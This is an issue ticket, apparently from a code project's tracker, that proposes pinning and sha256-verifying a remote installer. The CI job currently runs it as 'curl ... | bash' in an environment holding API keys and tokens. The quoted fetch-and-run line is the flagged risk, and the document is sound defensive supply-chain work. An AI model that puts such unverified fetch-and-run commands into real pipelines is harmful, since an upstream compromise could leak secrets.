Supply chain: pin qoder.com installer with sha256 verification

[zpzjzj]

Context: .github/workflows/ci.yml:219 runs curl -fsSL https://qoder.com/install | bash in the e2e job, which also has high-value secrets in env (DASHSCOPE_API_KEY, QODER_PERSONAL_ACCESS_TOKEN, ANTHROPIC_API_KEY, OPENAI_API_KEY). An upstream compromise or redirect downgrade would immediately exfiltrate them.

Proposal:

1. Pin the installer to a specific release tarball/version.
2. Capture the script once, store its sha256 in-repo, verify before `bash`.
3. Or install via a published package manager artifact (release tarball + checksum).

Tracked from: PR #33 self-review M2.